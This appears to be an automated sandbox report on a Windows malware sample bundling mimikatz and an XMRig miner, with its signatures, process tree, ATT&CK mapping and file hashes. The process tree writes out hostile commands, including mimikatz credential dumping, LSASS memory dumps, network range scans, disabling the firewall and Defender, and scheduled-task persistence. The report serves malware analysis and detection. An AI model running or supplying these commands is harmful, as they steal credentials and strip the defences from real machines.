Resubmissions
09-01-2025 07:08
250109-hyg9ssvndl 1009-01-2025 06:26
250109-g7l4ns1qew 1008-01-2025 07:49
250108-jn6p3ssrak 10Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
09-01-2025 07:08
General
-
Target
2025-01-08_67185fa9999bd87584927cab134afe81_hacktools_icedid_mimikatz.exe
-
Size
8.7MB
-
MD5
67185fa9999bd87584927cab134afe81
-
SHA1
822702b6113ae7862351b0af1bf0322ef005b6cc
-
SHA256
a0b78c1b935ebc21f28f450a7cdf349f34c4e918dc9badf91c9980918c657edc
-
SHA512
a8472dd8c19cae2cf0225d51e0e8666d732208a29dc84f4a05201dba737d8e8aa07fb75003a6507e6c1923d6f420af5e77b8e2d75a2d81936a29fabffc18fea3
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Xmrig family
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (44944) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Executes dropped EXE 30 IoCs
-
Loads dropped DLL 12 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
-
Creates a Windows Service
-
Drops file in System32 directory 10 IoCs
-
UPX packed file 36 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 59 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
NSIS installer 3 IoCs
-
Modifies data under HKEY_USERS 46 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 25 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\swsbcbmeu\bssyne.exe"C:\Windows\TEMP\swsbcbmeu\bssyne.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2025-01-08_67185fa9999bd87584927cab134afe81_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2025-01-08_67185fa9999bd87584927cab134afe81_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\nsyinawm\bytszzu.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\nsyinawm\bytszzu.exeC:\Windows\nsyinawm\bytszzu.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\nsyinawm\bytszzu.exeC:\Windows\nsyinawm\bytszzu.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\vuqibqfqb\ieymcmqub\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\vuqibqfqb\ieymcmqub\wpcap.exeC:\Windows\vuqibqfqb\ieymcmqub\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\vuqibqfqb\ieymcmqub\hbnqbyuem.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\vuqibqfqb\ieymcmqub\Scant.txt2⤵
-
C:\Windows\vuqibqfqb\ieymcmqub\hbnqbyuem.exeC:\Windows\vuqibqfqb\ieymcmqub\hbnqbyuem.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\vuqibqfqb\ieymcmqub\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\vuqibqfqb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\vuqibqfqb\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Windows\vuqibqfqb\Corporate\vfshost.exeC:\Windows\vuqibqfqb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "qsyirlhey" /ru system /tr "cmd /c C:\Windows\ime\bytszzu.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "qsyirlhey" /ru system /tr "cmd /c C:\Windows\ime\bytszzu.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "nabgiiueh" /ru system /tr "cmd /c echo Y|cacls C:\Windows\nsyinawm\bytszzu.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "nabgiiueh" /ru system /tr "cmd /c echo Y|cacls C:\Windows\nsyinawm\bytszzu.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bmefekubb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\swsbcbmeu\bssyne.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bmefekubb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\swsbcbmeu\bssyne.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 776 C:\Windows\TEMP\vuqibqfqb\776.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 316 C:\Windows\TEMP\vuqibqfqb\316.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 2128 C:\Windows\TEMP\vuqibqfqb\2128.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\vuqibqfqb\ieymcmqub\scan.bat2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\vuqibqfqb\ieymcmqub\lmsemquci.exelmsemquci.exe TCP 63.138.0.1 63.138.255.255 7001 512 /save3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 2684 C:\Windows\TEMP\vuqibqfqb\2684.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 2764 C:\Windows\TEMP\vuqibqfqb\2764.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 3028 C:\Windows\TEMP\vuqibqfqb\3028.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 380 C:\Windows\TEMP\vuqibqfqb\380.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 3752 C:\Windows\TEMP\vuqibqfqb\3752.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 3844 C:\Windows\TEMP\vuqibqfqb\3844.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 3904 C:\Windows\TEMP\vuqibqfqb\3904.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 3992 C:\Windows\TEMP\vuqibqfqb\3992.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 5000 C:\Windows\TEMP\vuqibqfqb\5000.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 2044 C:\Windows\TEMP\vuqibqfqb\2044.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 4104 C:\Windows\TEMP\vuqibqfqb\4104.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 3816 C:\Windows\TEMP\vuqibqfqb\3816.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 4608 C:\Windows\TEMP\vuqibqfqb\4608.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 4852 C:\Windows\TEMP\vuqibqfqb\4852.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 4048 C:\Windows\TEMP\vuqibqfqb\4048.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 1452 C:\Windows\TEMP\vuqibqfqb\1452.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\zefhau.exeC:\Windows\SysWOW64\zefhau.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\bytszzu.exe1⤵
-
C:\Windows\ime\bytszzu.exeC:\Windows\ime\bytszzu.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\nsyinawm\bytszzu.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\nsyinawm\bytszzu.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\swsbcbmeu\bssyne.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\swsbcbmeu\bssyne.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\bytszzu.exe1⤵
-
C:\Windows\ime\bytszzu.exeC:\Windows\ime\bytszzu.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\nsyinawm\bytszzu.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\nsyinawm\bytszzu.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\swsbcbmeu\bssyne.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\swsbcbmeu\bssyne.exe /p everyone:F2⤵
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Discovery
Network Service Discovery
2Network Share Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
4.1MB
MD565dd788e4a65e9658294e22dbf3d992d
SHA18b9d8d2944b3c2c79bbdbde0ec6c901a64b71f6b
SHA25668e082993eadd51a28e1e943511c284f0dcbcfa24ebb35e91971d5cae4479aa2
SHA512eafd3730aab7d96b5ae4d119d50ff1cb83f18e8e1f368bc000d5cdf7885d05906c1bee3c176ba44b0762dcb75648cac6de3c7215ad69ef767a0f3f3e76b01cc3
-
Filesize
7.5MB
MD503ee6eea4260e8f4edb883b403fdd688
